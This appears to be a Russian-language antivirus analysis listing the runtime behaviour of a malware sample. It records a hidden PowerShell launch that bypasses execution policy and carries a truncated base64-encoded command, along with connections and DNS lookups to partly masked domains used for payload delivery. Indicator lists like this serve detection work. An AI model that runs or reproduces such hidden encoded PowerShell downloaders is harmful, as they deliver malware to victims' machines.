Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABLADYAMQAwAF8ANAA9ACcAcgAzADMAOAA2ADQANgAzACcAOwAkAEIAMQAyAF8AMgAyADkAIAA9ACAAJwA2ADcANQAnADsAJABYADcAMQA0ADEAMQA0AD0AJwBFADQAOAAxADI...
- 'ko#####awaguchi01.com':443
- 'x1.#.lencr.org':80
- 'bo####mradio.net':80
- http://x1.#.lencr.org/
- http://bo####mradio.net/_vti_log/5hu7x820/
- http://www.bo####mradio.net/_vti_log/5hu7x820/
- 'ko#####awaguchi01.com':443
- DNS ASK qo####nderwear.com
- DNS ASK ko#####awaguchi01.com
- DNS ASK x1.#.lencr.org
- DNS ASK ta####travels.com
- DNS ASK bo####mradio.net
- DNS ASK so##ab.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABLADYAMQAwAF8ANAA9ACcAcgAzADMAOAA2ADQANgAzACcAOwAkAEIAMQAyAF8AMgAyADkAIAA9ACAAJwA2ADcANQAnADsAJABYADcAMQA0ADEAMQA0AD0AJwBFADQAOAAxADI... (со скрытым окном)